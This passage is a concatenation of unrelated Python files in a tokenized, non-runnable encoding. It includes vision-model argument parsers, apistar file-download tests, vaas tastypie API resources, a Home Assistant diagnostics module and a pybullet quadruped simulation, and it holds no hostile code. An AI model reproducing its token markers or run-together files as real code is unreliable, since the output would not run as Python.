useful for debugging with DDP" )<line_sep><return>parser<block_end><def_stmt>get_training_arguments parse_args:Optional[bool]=<true><block_start>parser=argparse.ArgumentParser(description="Training arguments" add_help=<true>)<line_sep># sampler related arguments parser=arguments_sampler(parser=parser)<line_sep># dataset related arguments parser=arguments_dataset(parser=parser)<line_sep># anchor generator arguments parser=arguments_anchor_gen(parser=parser)<line_sep># arguments related to box matcher parser=arguments_box_matcher(parser=parser)<line_sep># Video reader related arguments parser=arguments_video_reader(parser=parser)<line_sep># collate fn related arguments parser=arguments_collate_fn(parser=parser)<line_sep># transform related arguments parser=arguments_augmentation(parser=parser)<line_sep># model related arguments parser=arguments_nn_layers(parser=parser)<line_sep>parser=arguments_model(parser=parser)<line_sep>parser=arguments_ema(parser=parser)<line_sep># loss function arguments parser=arguments_loss_fn(parser=parser)<line_sep># optimizer arguments parser=arguments_optimizer(parser=parser)<line_sep>parser=arguments_scheduler(parser=parser)<line_sep># DDP arguments parser=arguments_ddp(parser=parser)<line_sep># stats arguments parser=arguments_stats(parser=parser)<line_sep># common parser=arguments_common(parser=parser)<if_stmt>parse_args# parse args <block_start>opts=parser.parse_args()<line_sep>opts=load_config_file(opts)<line_sep><return>opts<block_end><else_stmt><block_start><return>parser<block_end><block_end><def_stmt>get_eval_arguments parse_args=<true><block_start><return>get_training_arguments(parse_args=parse_args)<block_end><def_stmt>get_conversion_arguments <block_start>parser=get_training_arguments(parse_args=<false>)<line_sep># Arguments related to coreml conversion group=parser.add_argument_group("Conversion arguments")<line_sep>group.add_argument("--conversion.coreml-extn" type=str default="mlmodel" help="Extension for converted model. 
Default is mlmodel" )<line_sep>group.add_argument("--conversion.input-image-path" type=str default=<none> help="Path of the image to be used for conversion" )<line_sep># Arguments related to server. group.add_argument("--conversion.bucket-name" type=str help="Model job's bucket name")<line_sep>group.add_argument("--conversion.task-id" type=str help="Model job's id")<line_sep>group.add_argument("--conversion.viewers" type=str nargs="+" default=<none> help="Users who can view your models on server" )<line_sep># parse args opts=parser.parse_args()<line_sep>opts=load_config_file(opts)<line_sep><return>opts<block_end><def_stmt>get_bencmarking_arguments <block_start>parser=get_training_arguments(parse_args=<false>)<line_sep># group=parser.add_argument_group("Benchmarking arguments")<line_sep>group.add_argument("--benchmark.batch-size" type=int default=1 help="Batch size for benchmarking" )<line_sep>group.add_argument("--benchmark.warmup-iter" type=int default=10 help="Warm-up iterations")<line_sep>group.add_argument("--benchmark.n-iter" type=int default=100 help="Number of iterations for benchmarking" )<line_sep>group.add_argument("--benchmark.use-jit-model" action="store_true" help="Convert the model to JIT and then benchmark it" )<line_sep># parse args opts=parser.parse_args()<line_sep>opts=load_config_file(opts)<line_sep><return>opts<block_end><def_stmt>get_segmentation_eval_arguments <block_start>parser=get_training_arguments(parse_args=<false>)<line_sep>group=parser.add_argument_group("Segmentation evaluation related arguments")<line_sep>group.add_argument("--evaluation.segmentation.apply-color-map" action="store_true" help="Apply color map to different classes in segmentation masks. 
Useful in visualization "<concat>"+ some competitions (e.g, PASCAL VOC) accept submissions with colored segmentation masks" )<line_sep>group.add_argument("--evaluation.segmentation.save-overlay-rgb-pred" action="store_true" help="enable this flag to visualize predicted masks on top of input image" )<line_sep>group.add_argument("--evaluation.segmentation.save-masks" action="store_true" help="save predicted masks without colormaps. Useful for submitting to "<concat>"competitions like Cityscapes" )<line_sep>group.add_argument("--evaluation.segmentation.overlay-mask-weight" default=0.5 type=float help="Contribution of mask when overlaying on top of RGB image. " )<line_sep>group.add_argument("--evaluation.segmentation.mode" type=str default="validation_set" required=<false> choices=["single_image" "image_folder" "validation_set"] help="Contribution of mask when overlaying on top of RGB image. " )<line_sep>group.add_argument("--evaluation.segmentation.path" type=str default=<none> help="Path of the image or image folder (only required for single_image and image_folder modes)" )<line_sep>group.add_argument("--evaluation.segmentation.num-classes" type=str default=<none> help="Number of segmentation classes used during training" )<line_sep>group.add_argument("--evaluation.segmentation.resize-input-images" action="store_true" help="Resize input images" )<line_sep># parse args opts=parser.parse_args()<line_sep>opts=load_config_file(opts)<line_sep><return>opts<block_end><def_stmt>get_detection_eval_arguments <block_start>parser=get_training_arguments(parse_args=<false>)<line_sep>group=parser.add_argument_group("Detection evaluation related arguments")<line_sep>group.add_argument("--evaluation.detection.save-overlay-boxes" action="store_true" help="enable this flag to visualize predicted masks on top of input image" )<line_sep>group.add_argument("--evaluation.detection.mode" type=str default="validation_set" required=<false> choices=["single_image" "image_folder" 
"validation_set"] help="Contribution of mask when overlaying on top of RGB image. " )<line_sep>group.add_argument("--evaluation.detection.path" type=str default=<none> help="Path of the image or image folder (only required for single_image and image_folder modes)" )<line_sep>group.add_argument("--evaluation.detection.num-classes" type=str default=<none> help="Number of segmentation classes used during training" )<line_sep>group.add_argument("--evaluation.detection.resize-input-images" action="store_true" default=<false> help="Resize the input images" )<line_sep># parse args opts=parser.parse_args()<line_sep>opts=load_config_file(opts)<line_sep><return>opts<block_end><def_stmt>get_loss_landscape_args <block_start>parser=get_training_arguments(parse_args=<false>)<line_sep>group=parser.add_argument_group("Loss landscape related arguments")<line_sep>group.add_argument("--loss-landscape.n-points" type=int default=11 help="No. of grid points. Default is 11, so we have 11x11 grid" )<line_sep>group.add_argument("--loss-landscape.min-x" type=float default=-1.0 help="Min. value along x-axis" )<line_sep>group.add_argument("--loss-landscape.max-x" type=float default=1.0 help="Max. value along x-axis" )<line_sep>group.add_argument("--loss-landscape.min-y" type=float default=-1.0 help="Min. value along y-axis" )<line_sep>group.add_argument("--loss-landscape.max-y" type=float default=1.0 help="Max. value along y-axis" )<line_sep># parse args opts=parser.parse_args()<line_sep>opts=load_config_file(opts)<line_sep><return>opts<block_end>
<import_stmt>os<import_from_stmt>starlette.applications Starlette<import_from_stmt>starlette.responses PlainTextResponse Response<import_from_stmt>starlette.testclient TestClient<import_from_stmt>apistar.client Client decoders<line_sep>app=Starlette()<line_sep>@app.route("/text-response/")<def_stmt>text_response request<block_start><return>PlainTextResponse("hello, world")<block_end>@app.route("/file-response/")<def_stmt>file_response request<block_start>headers={"Content-Type":"image/png" "Content-Disposition":'attachment; filename="filename.png"' }<line_sep><return>Response(b"<somedata>" headers=headers)<block_end>@app.route("/file-response-url-filename/name.png")<def_stmt>file_response_url_filename request<block_start>headers={"Content-Type":"image/png" "Content-Disposition":"attachment"}<line_sep><return>Response(b"<somedata>" headers=headers)<block_end>@app.route("/file-response-no-extension/name")<def_stmt>file_response_no_extension request<block_start>headers={"Content-Type":"image/png" "Content-Disposition":"attachment"}<line_sep><return>Response(b"<somedata>" headers=headers)<block_end>@app.route("/")<def_stmt>file_response_no_name request<block_start>headers={"Content-Type":"image/png" "Content-Disposition":"attachment"}<line_sep><return>Response(b"<somedata>" headers=headers)<block_end>schema={"openapi":"3.0.0" "info":{"title":"Test API" "version":"1.0"} "servers":[{"url":"http://testserver"}] "paths":{"/text-response/":{"get":{"operationId":"text-response"}} "/file-response/":{"get":{"operationId":"file-response"}} "/file-response-url-filename/name.png":{"get":{"operationId":"file-response-url-filename"}} "/file-response-no-extension/name":{"get":{"operationId":"file-response-no-extension"}} "/":{"get":{"operationId":"file-response-no-name"}} } }<def_stmt>test_text_response <block_start>client=Client(schema session=TestClient(app))<line_sep>data=client.request("text-response")<assert_stmt>data<eq>"hello, world"<block_end><def_stmt>test_file_response 
<block_start>client=Client(schema session=TestClient(app))<line_sep>data=client.request("file-response")<assert_stmt>os.path.basename(data.name)<eq>"filename.png"<assert_stmt>data.read()<eq>b"<somedata>"<block_end><def_stmt>test_file_response_url_filename <block_start>client=Client(schema session=TestClient(app))<line_sep>data=client.request("file-response-url-filename")<assert_stmt>os.path.basename(data.name)<eq>"name.png"<assert_stmt>data.read()<eq>b"<somedata>"<block_end><def_stmt>test_file_response_no_extension <block_start>client=Client(schema session=TestClient(app))<line_sep>data=client.request("file-response-no-extension")<assert_stmt>os.path.basename(data.name)<eq>"name.png"<assert_stmt>data.read()<eq>b"<somedata>"<block_end><def_stmt>test_file_response_no_name <block_start>client=Client(schema session=TestClient(app))<line_sep>data=client.request("file-response-no-name")<assert_stmt>os.path.basename(data.name)<eq>"download.png"<assert_stmt>data.read()<eq>b"<somedata>"<block_end><def_stmt>test_unique_filename tmpdir<block_start>client=Client(schema session=TestClient(app) decoders=[decoders.DownloadDecoder(tmpdir)])<line_sep>data=client.request("file-response")<assert_stmt>os.path.basename(data.name)<eq>"filename.png"<assert_stmt>data.read()<eq>b"<somedata>"<line_sep>data=client.request("file-response")<assert_stmt>os.path.basename(data.name)<eq>"filename (1).png"<assert_stmt>data.read()<eq>b"<somedata>"<block_end>
# -*- coding: utf-8 -*- <import_stmt>logging<import_from_stmt>celery.result AsyncResult<import_from_stmt>tastypie.resources ModelResource ALL_WITH_RELATIONS Resource<import_from_stmt>tastypie fields<import_from_stmt>tastypie.fields ListField<import_from_stmt>tastypie.authentication ApiKeyAuthentication MultiAuthentication SessionAuthentication<import_from_stmt>vaas.external.api ExtendedDjangoAuthorization<as>DjangoAuthorization<import_from_stmt>vaas.external.tasty_validation ModelCleanedDataFormValidation<import_from_stmt>vaas.external.serializer PrettyJSONSerializer<import_from_stmt>vaas.cluster.api DcResource<import_from_stmt>vaas.manager.forms ProbeModelForm DirectorModelForm BackendModelForm TimeProfileModelForm<import_from_stmt>vaas.manager.models Backend Probe Director TimeProfile ReloadTask<import_from_stmt>vaas.monitor.models BackendStatus<import_from_stmt>vaas.external.oauth VaasMultiAuthentication<line_sep>logger=logging.getLogger('vaas')<class_stmt>TimeProfileResource(ModelResource)<block_start><class_stmt>Meta<block_start>queryset=TimeProfile.objects.all()<line_sep>resource_name='time_profile'<line_sep>serializer=PrettyJSONSerializer()<line_sep>authorization=DjangoAuthorization()<line_sep>authentication=VaasMultiAuthentication(ApiKeyAuthentication())<line_sep>validation=ModelCleanedDataFormValidation(form_class=TimeProfileModelForm)<line_sep>always_return_data=<true><line_sep>filtering={'max_connections':['exact'] 'connect_timeout':['exact'] 'first_byte_timeout':['exact'] 
'between_bytes_timeout':['exact']}<block_end><block_end><class_stmt>ProbeResource(ModelResource)<block_start><class_stmt>Meta<block_start>queryset=Probe.objects.all()<line_sep>resource_name='probe'<line_sep>serializer=PrettyJSONSerializer()<line_sep>authorization=DjangoAuthorization()<line_sep>authentication=VaasMultiAuthentication(ApiKeyAuthentication())<line_sep>validation=ModelCleanedDataFormValidation(form_class=ProbeModelForm)<line_sep>always_return_data=<true><line_sep>filtering={'name':['exact'] 'url':['exact'] 'expected_response':['exact']}<block_end><block_end><class_stmt>DirectorResource(ModelResource)<block_start>probe=fields.ForeignKey(ProbeResource 'probe' full=<true>)<line_sep>time_profile=fields.ForeignKey(TimeProfileResource 'time_profile' full=<true>)<line_sep>backends=fields.ToManyField('vaas.manager.api.BackendResource' 'backends' null=<true>)<line_sep>cluster=fields.ToManyField('vaas.cluster.api.LogicalClusterResource' 'cluster' null=<true> full=<true>)<class_stmt>Meta<block_start>queryset=Director.objects.all()<line_sep>resource_name='director'<line_sep>serializer=PrettyJSONSerializer()<line_sep>authorization=DjangoAuthorization()<line_sep>authentication=VaasMultiAuthentication(ApiKeyAuthentication() SessionAuthentication())<line_sep>validation=ModelCleanedDataFormValidation(form_class=DirectorModelForm)<line_sep>always_return_data=<true><line_sep>filtering={'name':['exact'] 'enabled':['exact'] 'probe':ALL_WITH_RELATIONS 'cluster':ALL_WITH_RELATIONS 'service':['exact'] 'virtual':['exact'] 'service_tag':['exact'] 'reachable_via_service_mesh':['exact'] }<block_end><def_stmt>save_m2m self bundle<block_start><try_stmt><block_start>new_uris=bundle.obj.new_clusters_uris<line_sep>bundle.obj.new_clusters=[cluster.obj<for>cluster bundle.data['cluster']<if>cluster.data['resource_uri']<in>new_uris]<line_sep>logger.info("[DirectorResource.save_m2m()] new_clusters = %s" bundle.obj.new_clusters)<block_end><except_stmt>(AttributeError 
KeyError)<block_start><pass><block_end><return>super(DirectorResource self).save_m2m(bundle)<block_end><def_stmt>update_in_place self request original_bundle new_data<block_start><try_stmt><block_start>original_bundle.obj.old_clusters=list(original_bundle.obj.cluster.all())<block_end><except_stmt>AttributeError<block_start>original_bundle.obj.old_clusters=[]<block_end>logger.info("[DirectorResource.update_in_place()] old_clusters = %s" original_bundle.obj.old_clusters)<try_stmt><block_start>original_bundle.obj.new_clusters_uris=new_data['cluster']<block_end><except_stmt>KeyError<block_start>original_bundle.obj.new_clusters_uris=[]<block_end>original_bundle.obj.new_data=new_data<line_sep><return>super(DirectorResource self).update_in_place(request original_bundle new_data)<block_end><block_end><class_stmt>BackendResource(ModelResource)<block_start>dc=fields.ForeignKey(DcResource 'dc' full=<true>)<line_sep>director=fields.ForeignKey(DirectorResource 'director')<line_sep>tags=ListField()<class_stmt>Meta<block_start>queryset=Backend.objects.all()<line_sep>resource_name='backend'<line_sep>serializer=PrettyJSONSerializer()<line_sep>authorization=DjangoAuthorization()<line_sep>authentication=VaasMultiAuthentication(ApiKeyAuthentication())<line_sep>validation=ModelCleanedDataFormValidation(form_class=BackendModelForm)<line_sep>always_return_data=<true><line_sep>filtering={'dc':ALL_WITH_RELATIONS 'director':ALL_WITH_RELATIONS 'address':['exact'] 'port':['exact']}<block_end><def_stmt>dehydrate self bundle<block_start>status=BackendStatus.objects.filter(address=bundle.data['address'] port=bundle.data['port'])<if_stmt>len(status)<g>0<block_start>bundle.data['status']=status[0].status<block_end><else_stmt><block_start>bundle.data['status']="Unknown"<block_end>bundle.data['time_profile']={'max_connections':bundle.obj.director.time_profile.max_connections 'connect_timeout':bundle.obj.director.time_profile.connect_timeout 
'first_byte_timeout':bundle.obj.director.time_profile.first_byte_timeout 'between_bytes_timeout':bundle.obj.director.time_profile.between_bytes_timeout}<line_sep><return>bundle<block_end><def_stmt>build_filters self filters=<none> ignore_bad_filters=<false><block_start><if_stmt>filters<is><none><block_start>filters={}<block_end>orm_filters=super(BackendResource self).build_filters(filters ignore_bad_filters=ignore_bad_filters)<if_stmt>'tag'<in>filters<block_start>orm_filters['tags__name__in']=filters['tag'].split(',')<block_end><return>orm_filters<block_end><def_stmt>dehydrate_tags self bundle<block_start><return>list(map(str bundle.obj.tags.all()))<block_end><def_stmt>hydrate_tags self bundle<block_start><if_stmt>isinstance(bundle.data.get('tags') list)<block_start>bundle.data['tags']=','.join(bundle.data['tags'])<block_end><elif_stmt>bundle.data.get('tags')<is><none><block_start>bundle.data['tags']=''<block_end><return>bundle<block_end><def_stmt>save_m2m self bundle<block_start>tags=bundle.data.get('tags' [])<line_sep>bundle.obj.tags.set(*tags)<line_sep><return>super(BackendResource self).save_m2m(bundle)<block_end><block_end><class_stmt>ReloadTaskResource(Resource)<block_start>status=fields.CharField(attribute='status')<line_sep>info=fields.CharField(attribute='info')<class_stmt>Meta<block_start>resource_name='task'<line_sep>list_allowed_methods=['get']<line_sep>authorization=DjangoAuthorization()<line_sep>authentication=VaasMultiAuthentication(ApiKeyAuthentication())<line_sep>fields=['status' 'info']<line_sep>include_resource_uri=<true><block_end><def_stmt>obj_get self bundle **kwargs<block_start>task=AsyncResult(kwargs['pk'])<line_sep><return>ReloadTask(kwargs['pk'] task.status '{}'.format(task.info))<block_end><def_stmt>get_object_list self request<block_start><return><none><block_end><block_end>
"""Diagnostics support for Launch Library."""<import_from_future_stmt> annotations<import_from_stmt>typing Any<import_from_stmt>pylaunches.objects.event Event<import_from_stmt>pylaunches.objects.launch Launch<import_from_stmt>homeassistant.config_entries ConfigEntry<import_from_stmt>homeassistant.core HomeAssistant<import_from_stmt>homeassistant.helpers.update_coordinator DataUpdateCoordinator<import_from_stmt>. LaunchLibraryData<import_from_stmt>.const DOMAIN<async_keyword><def_stmt>async_get_config_entry_diagnostics hass:HomeAssistant entry:ConfigEntry <arrow>dict[str Any]<block_start>"""Return diagnostics for a config entry."""<line_sep>coordinator:DataUpdateCoordinator[LaunchLibraryData]=hass.data[DOMAIN]<if_stmt>coordinator.data<is><none><block_start><return>{}<block_end><def_stmt>_first_element data:list[Launch|Event]<arrow>dict[str Any]|<none><block_start><if_stmt><not>data<block_start><return><none><block_end><return>data[0].raw_data_contents<block_end><return>{"next_launch":_first_element(coordinator.data["upcoming_launches"]) "starship_launch":_first_element(coordinator.data["starship_events"].upcoming.launches) "starship_event":_first_element(coordinator.data["starship_events"].upcoming.events) }<block_end>
<import_stmt>pybullet<as>p<import_stmt>time<import_stmt>math<import_stmt>pybullet_data<def_stmt>drawInertiaBox parentUid parentLinkIndex color<block_start>dyn=p.getDynamicsInfo(parentUid parentLinkIndex)<line_sep>mass=dyn[0]<line_sep>frictionCoeff=dyn[1]<line_sep>inertia=dyn[2]<if_stmt>(mass<g>0)<block_start>Ixx=inertia[0]<line_sep>Iyy=inertia[1]<line_sep>Izz=inertia[2]<line_sep>boxScaleX=0.5<times>math.sqrt(6<times>(Izz+Iyy-Ixx)/mass)<line_sep>boxScaleY=0.5<times>math.sqrt(6<times>(Izz+Ixx-Iyy)/mass)<line_sep>boxScaleZ=0.5<times>math.sqrt(6<times>(Ixx+Iyy-Izz)/mass)<line_sep>halfExtents=[boxScaleX boxScaleY boxScaleZ]<line_sep>pts=[[halfExtents[0] halfExtents[1] halfExtents[2]] [-halfExtents[0] halfExtents[1] halfExtents[2]] [halfExtents[0] -halfExtents[1] halfExtents[2]] [-halfExtents[0] -halfExtents[1] halfExtents[2]] [halfExtents[0] halfExtents[1] -halfExtents[2]] [-halfExtents[0] halfExtents[1] -halfExtents[2]] [halfExtents[0] -halfExtents[1] -halfExtents[2]] [-halfExtents[0] -halfExtents[1] -halfExtents[2]]]<line_sep>p.addUserDebugLine(pts[0] pts[1] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[1] pts[3] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[3] pts[2] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[2] pts[0] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[0] pts[4] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[1] pts[5] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[2] pts[6] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[3] pts[7] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[4+0] pts[4+1] color 1 
parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[4+1] pts[4+3] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[4+3] pts[4+2] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[4+2] pts[4+0] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<block_end><block_end>toeConstraint=<true><line_sep>useMaximalCoordinates=<false><line_sep>useRealTime=0<line_sep>#the fixedTimeStep and numSolverIterations are the most important parameters to trade-off quality versus performance fixedTimeStep=1./100<line_sep>numSolverIterations=50<if_stmt>(useMaximalCoordinates)<block_start>fixedTimeStep=1./500<line_sep>numSolverIterations=200<block_end>speed=10<line_sep>amplitude=0.8<line_sep>jump_amp=0.5<line_sep>maxForce=3.5<line_sep>kneeFrictionForce=0<line_sep>kp=1<line_sep>kd=.5<line_sep>maxKneeForce=1000<line_sep>physId=p.connect(p.SHARED_MEMORY_GUI)<if_stmt>(physId<l>0)<block_start>p.connect(p.GUI)<block_end>#p.resetSimulation() p.setAdditionalSearchPath(pybullet_data.getDataPath())<line_sep>angle=0# pick in range 0..0.2 radians orn=p.getQuaternionFromEuler([0 angle 0])<line_sep>p.loadURDF("plane.urdf" [0 0 0] orn)<line_sep>p.setPhysicsEngineParameter(numSolverIterations=numSolverIterations)<line_sep>p.startStateLogging(p.STATE_LOGGING_GENERIC_ROBOT "genericlogdata.bin" maxLogDof=16 logFlags=p.STATE_LOG_JOINT_TORQUES)<line_sep>p.setTimeOut(4000000)<line_sep>p.setGravity(0 0 0)<line_sep>p.setTimeStep(fixedTimeStep)<line_sep>orn=p.getQuaternionFromEuler([0 0 0.4])<line_sep>p.setRealTimeSimulation(0)<line_sep>quadruped=p.loadURDF("quadruped/minitaur_v1.urdf" [1 -1 .3] orn useFixedBase=<false> useMaximalCoordinates=useMaximalCoordinates flags=p.URDF_USE_IMPLICIT_CYLINDER)<line_sep>nJoints=p.getNumJoints(quadruped)<line_sep>jointNameToId={}<for_stmt>i range(nJoints)<block_start>jointInfo=p.getJointInfo(quadruped 
i)<line_sep>jointNameToId[jointInfo[1].decode('UTF-8')]=jointInfo[0]<block_end>motor_front_rightR_joint=jointNameToId['motor_front_rightR_joint']<line_sep>motor_front_rightL_joint=jointNameToId['motor_front_rightL_joint']<line_sep>knee_front_rightL_link=jointNameToId['knee_front_rightL_link']<line_sep>hip_front_rightR_link=jointNameToId['hip_front_rightR_link']<line_sep>knee_front_rightR_link=jointNameToId['knee_front_rightR_link']<line_sep>motor_front_rightL_link=jointNameToId['motor_front_rightL_link']<line_sep>motor_front_leftR_joint=jointNameToId['motor_front_leftR_joint']<line_sep>hip_front_leftR_link=jointNameToId['hip_front_leftR_link']<line_sep>knee_front_leftR_link=jointNameToId['knee_front_leftR_link']<line_sep>motor_front_leftL_joint=jointNameToId['motor_front_leftL_joint']<line_sep>motor_front_leftL_link=jointNameToId['motor_front_leftL_link']<line_sep>knee_front_leftL_link=jointNameToId['knee_front_leftL_link']<line_sep>motor_back_rightR_joint=jointNameToId['motor_back_rightR_joint']<line_sep>hip_rightR_link=jointNameToId['hip_rightR_link']<line_sep>knee_back_rightR_link=jointNameToId['knee_back_rightR_link']<line_sep>motor_back_rightL_joint=jointNameToId['motor_back_rightL_joint']<line_sep>motor_back_rightL_link=jointNameToId['motor_back_rightL_link']<line_sep>knee_back_rightL_link=jointNameToId['knee_back_rightL_link']<line_sep>motor_back_leftR_joint=jointNameToId['motor_back_leftR_joint']<line_sep>hip_leftR_link=jointNameToId['hip_leftR_link']<line_sep>knee_back_leftR_link=jointNameToId['knee_back_leftR_link']<line_sep>motor_back_leftL_joint=jointNameToId['motor_back_leftL_joint']<line_sep>motor_back_leftL_link=jointNameToId['motor_back_leftL_link']<line_sep>knee_back_leftL_link=jointNameToId['knee_back_leftL_link']<line_sep>#fixtorso = p.createConstraint(-1,-1,quadruped,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,0,0]) motordir=[-1 -1 -1 -1 1 1 1 
1]<line_sep>halfpi=1.57079632679<line_sep>twopi=4<times>halfpi<line_sep>kneeangle=-2.1834<line_sep>dyn=p.getDynamicsInfo(quadruped -1)<line_sep>mass=dyn[0]<line_sep>friction=dyn[1]<line_sep>localInertiaDiagonal=dyn[2]<line_sep>print("localInertiaDiagonal" localInertiaDiagonal)<line_sep>#this is a no-op, just to show the API p.changeDynamics(quadruped -1 localInertiaDiagonal=localInertiaDiagonal)<line_sep>#for i in range (nJoints): # p.changeDynamics(quadruped,i,localInertiaDiagonal=[0.000001,0.000001,0.000001]) drawInertiaBox(quadruped -1 [1 0 0])<line_sep>#drawInertiaBox(quadruped,motor_front_rightR_joint, [1,0,0]) <for_stmt>i range(nJoints)<block_start>drawInertiaBox(quadruped i [0 1 0])<block_end><if_stmt>(useMaximalCoordinates)<block_start>steps=400<for_stmt>aa range(steps)<block_start>p.setJointMotorControl2(quadruped motor_front_leftL_joint p.POSITION_CONTROL motordir[0]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_front_leftR_joint p.POSITION_CONTROL motordir[1]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_back_leftL_joint p.POSITION_CONTROL motordir[2]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_back_leftR_joint p.POSITION_CONTROL motordir[3]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_front_rightL_joint p.POSITION_CONTROL motordir[4]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_front_rightR_joint p.POSITION_CONTROL motordir[5]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_back_rightL_joint p.POSITION_CONTROL motordir[6]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_back_rightR_joint p.POSITION_CONTROL motordir[7]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_front_leftL_link p.POSITION_CONTROL 
motordir[0]<times>(kneeangle+twopi)<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_front_leftR_link p.POSITION_CONTROL motordir[1]<times>kneeangle<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_back_leftL_link p.POSITION_CONTROL motordir[2]<times>kneeangle<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_back_leftR_link p.POSITION_CONTROL motordir[3]<times>(kneeangle+twopi)<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_front_rightL_link p.POSITION_CONTROL motordir[4]<times>(kneeangle)<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_front_rightR_link p.POSITION_CONTROL motordir[5]<times>(kneeangle+twopi)<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_back_rightL_link p.POSITION_CONTROL motordir[6]<times>(kneeangle+twopi)<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_back_rightR_link p.POSITION_CONTROL motordir[7]<times>kneeangle<times>float(aa)/steps)<line_sep>p.stepSimulation()<line_sep>#time.sleep(fixedTimeStep) <block_end><block_end><else_stmt><block_start>p.resetJointState(quadruped motor_front_leftL_joint motordir[0]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_front_leftL_link motordir[0]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_front_leftR_joint motordir[1]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_front_leftR_link motordir[1]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_back_leftL_joint motordir[2]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_back_leftL_link motordir[2]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_back_leftR_joint motordir[3]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_back_leftR_link motordir[3]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_front_rightL_joint motordir[4]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_front_rightL_link 
motordir[4]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_front_rightR_joint motordir[5]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_front_rightR_link motordir[5]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_back_rightL_joint motordir[6]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_back_rightL_link motordir[6]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_back_rightR_joint motordir[7]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_back_rightR_link motordir[7]<times>kneeangle)<block_end>#p.getNumJoints(1) <if_stmt>(toeConstraint)<block_start>cid=p.createConstraint(quadruped knee_front_leftR_link quadruped knee_front_leftL_link p.JOINT_POINT2POINT [0 0 0] [0 0.005 0.1] [0 0.01 0.1])<line_sep>p.changeConstraint(cid maxForce=maxKneeForce)<line_sep>cid=p.createConstraint(quadruped knee_front_rightR_link quadruped knee_front_rightL_link p.JOINT_POINT2POINT [0 0 0] [0 0.005 0.1] [0 0.01 0.1])<line_sep>p.changeConstraint(cid maxForce=maxKneeForce)<line_sep>cid=p.createConstraint(quadruped knee_back_leftR_link quadruped knee_back_leftL_link p.JOINT_POINT2POINT [0 0 0] [0 0.005 0.1] [0 0.01 0.1])<line_sep>p.changeConstraint(cid maxForce=maxKneeForce)<line_sep>cid=p.createConstraint(quadruped knee_back_rightR_link quadruped knee_back_rightL_link p.JOINT_POINT2POINT [0 0 0] [0 0.005 0.1] [0 0.01 0.1])<line_sep>p.changeConstraint(cid maxForce=maxKneeForce)<block_end><if_stmt>(1)<block_start>p.setJointMotorControl(quadruped knee_front_leftL_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_front_leftR_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_front_rightL_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_front_rightR_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_back_leftL_link p.VELOCITY_CONTROL 0 
